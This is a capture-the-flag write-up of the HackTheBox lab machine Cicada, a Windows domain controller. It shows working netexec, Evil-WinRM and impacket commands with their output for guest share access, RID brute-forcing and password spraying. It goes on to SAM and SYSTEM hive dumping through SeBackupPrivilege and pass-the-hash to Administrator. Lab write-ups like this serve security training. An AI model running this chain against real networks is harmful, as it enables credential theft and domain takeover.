Cicada - HackTheBox
CTF Writeup for Cicada from HackTheBox
Based on enabled Guest account and bad AD user permissions.
Starting with a nmap..
PORT STATE SERVICE REASON
53/tcp open domain syn-ack ttl 127
88/tcp open kerberos-sec syn-ack ttl 127
135/tcp open msrpc syn-ack ttl 127
139/tcp open netbios-ssn syn-ack ttl 127
389/tcp open ldap syn-ack ttl 127
445/tcp open microsoft-ds syn-ack ttl 127
464/tcp open kpasswd5 syn-ack ttl 127
593/tcp open http-rpc-epmap syn-ack ttl 127
636/tcp open ldapssl syn-ack ttl 127
3268/tcp open globalcatLDAP syn-ack ttl 127
3269/tcp open globalcatLDAPssl syn-ack ttl 127
5985/tcp open wsman syn-ack ttl 127
57262/tcp open unknown syn-ack ttl 127Based on the output we can gather a 'cicada.htb' from certs. Box is 'CICADA-DC'.
Checking SMB shares with anonymous access..
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
DEV Disk
HR Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server shareSMB shares
Anonymous DEV share access blocked, but HR is open.
smb: \> ls
. D 0 Thu Mar 14 14:29:09 2024
.. D 0 Thu Mar 14 14:21:29 2024
Notice from HR.txt A 1266 Wed Aug 28 20:31:48 2024SMB's HR share
Checking the txt we find a password.
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team. As part of our security protocols, it's essential that you change your default password to something unique and secure.
Your default password is: ********
... snip ...
Best regards,
Cicada CorpNow that we have a password, we need to find some users. But since there is no website hosted on the box, we have to do AD enumeration.
Checking anonymous and Guest access..
user@c2:~:$ netexec smb cicada.htb -u '' -p '' --shares
SMB xxx.xxx.xxx.xxx 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB xxx.xxx.xxx.xxx 445 CICADA-DC [+] cicada.htb\:
SMB xxx.xxx.xxx.xxx 445 CICADA-DC [-] Error enumerating shares: STATUS_ACCESS_DENIEDAnonymous access denied
user@c2:~:$ netexec smb cicada.htb -u 'Guest' -p '' --shares
SMB xxx.xxx.xxx.xxx 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB xxx.xxx.xxx.xxx 445 CICADA-DC [+] cicada.htb\Guest:
SMB xxx.xxx.xxx.xxx 445 CICADA-DC [*] Enumerated shares
SMB xxx.xxx.xxx.xxx 445 CICADA-DC Share Permissions Remark
SMB xxx.xxx.xxx.xxx 445 CICADA-DC ----- ----------- ------
SMB xxx.xxx.xxx.xxx 445 CICADA-DC ADMIN$ Remote Admin
SMB xxx.xxx.xxx.xxx 445 CICADA-DC C$ Default share
SMB xxx.xxx.xxx.xxx 445 CICADA-DC DEV
SMB xxx.xxx.xxx.xxx 445 CICADA-DC HR READ
SMB xxx.xxx.xxx.xxx 445 CICADA-DC IPC$ READ Remote IPC
SMB xxx.xxx.xxx.xxx 445 CICADA-DC NETLOGON Logon server share
SMB xxx.xxx.xxx.xxx 445 CICADA-DC SYSVOL Logon server shareGuest access allowed
Now we know the Guest account is enabled to some capacity, maybe we can enumerate users.
user@c2:~:$ netexec smb cicada.htb -u 'Guest' -p '' --rid-brute
SMB xxx.xxx.xxx.xxx 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB xxx.xxx.xxx.xxx 445 CICADA-DC [+] cicada.htb\Guest:
SMB xxx.xxx.xxx.xxx 445 CICADA-DC 498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB xxx.xxx.xxx.xxx 445 CICADA-DC 500: CICADA\Administrator (SidTypeUser)
SMB xxx.xxx.xxx.xxx 445 CICADA-DC 501: CICADA\Guest (SidTypeUser)
SMB xxx.xxx.xxx.xxx 445 CICADA-DC 502: CICADA\krbtgt (SidTypeUser)
SMB xxx.xxx.xxx.xxx 445 CICADA-DC 512: CICADA\Domain Admins (SidTypeGroup)
SMB xxx.xxx.xxx.xxx 445 CICADA-DC 513: CICADA\Domain Users (SidTypeGroup)
... snip ...
SMB xxx.xxx.xxx.xxx 445 CICADA-DC 1000: CICADA\CICADA-DC$ (SidTypeUser)
SMB xxx.xxx.xxx.xxx 445 CICADA-DC 1101: CICADA\DnsAdmins (SidTypeAlias)
SMB xxx.xxx.xxx.xxx 445 CICADA-DC 1102: CICADA\DnsUpdateProxy (SidTypeGroup)
SMB xxx.xxx.xxx.xxx 445 CICADA-DC 1103: CICADA\Groups (SidTypeGroup)
SMB xxx.xxx.xxx.xxx 445 CICADA-DC 1104: CICADA\john.smoulder (SidTypeUser)
SMB xxx.xxx.xxx.xxx 445 CICADA-DC 1105: CICADA\sarah.dantelia (SidTypeUser)
SMB xxx.xxx.xxx.xxx 445 CICADA-DC 1106: CICADA\michael.wrightson (SidTypeUser)
SMB xxx.xxx.xxx.xxx 445 CICADA-DC 1108: CICADA\david.orelious (SidTypeUser)
SMB xxx.xxx.xxx.xxx 445 CICADA-DC 1109: CICADA\Dev Support (SidTypeGroup)
SMB xxx.xxx.xxx.xxx 445 CICADA-DC 1601: CICADA\emily.oscars (SidTypeUser)classic rid brute force
Now with the list of users, lettuce spray the AD..
user@c2:~:$ netexec smb cicada.htb -u ~/Downloads/users.txt -p '********' --users
SMB xxx.xxx.xxx.xxx 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB xxx.xxx.xxx.xxx 445 CICADA-DC [-] cicada.htb\john.smoulder:******** STATUS_LOGON_FAILURE
SMB xxx.xxx.xxx.xxx 445 CICADA-DC [-] cicada.htb\sarah.dantelia:******** STATUS_LOGON_FAILURE
SMB xxx.xxx.xxx.xxx 445 CICADA-DC [+] cicada.htb\michael.wrightson:********
SMB xxx.xxx.xxx.xxx 445 CICADA-DC -Username- -Last PW Set- -BadPW- -Description-
SMB xxx.xxx.xxx.xxx 445 CICADA-DC Administrator 2024-08-26 20:08:03 667 Built-in account for administering the computer/domain
SMB xxx.xxx.xxx.xxx 445 CICADA-DC Guest 2024-08-28 17:26:56 0 Built-in account for guest access to the computer/domain
SMB xxx.xxx.xxx.xxx 445 CICADA-DC krbtgt 2024-03-14 11:14:10 0 Key Distribution Center Service Account
SMB xxx.xxx.xxx.xxx 445 CICADA-DC john.smoulder 2024-03-14 12:17:29 2
SMB xxx.xxx.xxx.xxx 445 CICADA-DC sarah.dantelia 2024-03-14 12:17:29 2
SMB xxx.xxx.xxx.xxx 445 CICADA-DC michael.wrightson 2024-03-14 12:17:29 0
SMB xxx.xxx.xxx.xxx 445 CICADA-DC david.orelious 2024-03-14 12:17:29 0 Just in case I forget my password is ********
SMB xxx.xxx.xxx.xxx 445 CICADA-DC emily.oscars 2024-08-22 21:20:17 0
SMB xxx.xxx.xxx.xxx 445 CICADA-DC [*] Enumerated 8 local users: CICADAWe now have a list of the groups/users within the CICADA AD and strangely a supposed password for the user 'david.orelious'.
Now we have two AD users, I'm going to check that SMB 'DEV' share permissions..
user@c2:~:$ netexec smb cicada.htb -u 'michael.wrightson' -p '********' --shares
... snip ...
SMB xxx.xxx.xxx.xxx 445 CICADA-DC Share Permissions Remark
SMB xxx.xxx.xxx.xxx 445 CICADA-DC ----- ----------- ------
SMB xxx.xxx.xxx.xxx 445 CICADA-DC ADMIN$ Remote Admin
SMB xxx.xxx.xxx.xxx 445 CICADA-DC C$ Default share
SMB xxx.xxx.xxx.xxx 445 CICADA-DC DEV
SMB xxx.xxx.xxx.xxx 445 CICADA-DC HR READ
... snip ...SMB 'michael.wrightson' share access
user@c2:~:$ netexec smb cicada.htb -u 'david.orelious' -p '********' --shares
... snip ...
SMB xxx.xxx.xxx.xxx 445 CICADA-DC Share Permissions Remark
SMB xxx.xxx.xxx.xxx 445 CICADA-DC ----- ----------- ------
SMB xxx.xxx.xxx.xxx 445 CICADA-DC ADMIN$ Remote Admin
SMB xxx.xxx.xxx.xxx 445 CICADA-DC C$ Default share
SMB xxx.xxx.xxx.xxx 445 CICADA-DC DEV READ
SMB xxx.xxx.xxx.xxx 445 CICADA-DC HR READ
... snip ...SMB 'david.orelious' share access
David has access to the 'DEV' share..
smb: \> ls
. D 0 Thu Mar 14 14:31:39 2024
.. D 0 Thu Mar 14 14:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 20:28:22 2024SMB's DEV share
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "********" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"Backup_script.ps1Backup_script.ps1
We now have credentials to user 'emily.oscars'. Unlike the other two, she has WinRM access.
user@c2:~:$ netexec winrm cicada.htb -u 'emily.oscars' -p '********'
... snip ...
WINRM xxx.xxx.xxx.xxx 5985 CICADA-DC [+] cicada.htb\emily.oscars:******** (Pwn3d!)*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> type user.txt
> ********************************user.txt
Checking permissions.
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set EnabledThe SeBackupPrivilege/SeRestorePrivilege, ruh roh.
Since we are taking over this one machine, the local 'Administrator' account will due.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Downloads> reg save hklm\sam sam
> The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Downloads> reg save hklm\system system
> The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Downloads> download sam
> Info: Downloading C:\Users\emily.oscars.CICADA\Downloads\sam to sam
> Info: Download successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Downloads> download system
> Info: Downloading C:\Users\emily.oscars.CICADA\Downloads\system to system
> Info: Download successful!dump sam and system
user@c2:~:$ impacket-secretsdump -sam sam -system system LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: *********
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:********:********:::
Guest:501:********:********:::
DefaultAccount:503:********:********:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...secretsdump
Now we have the local Administrator account hash, we can PtH.
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
> ********************************root.txt
That's all (: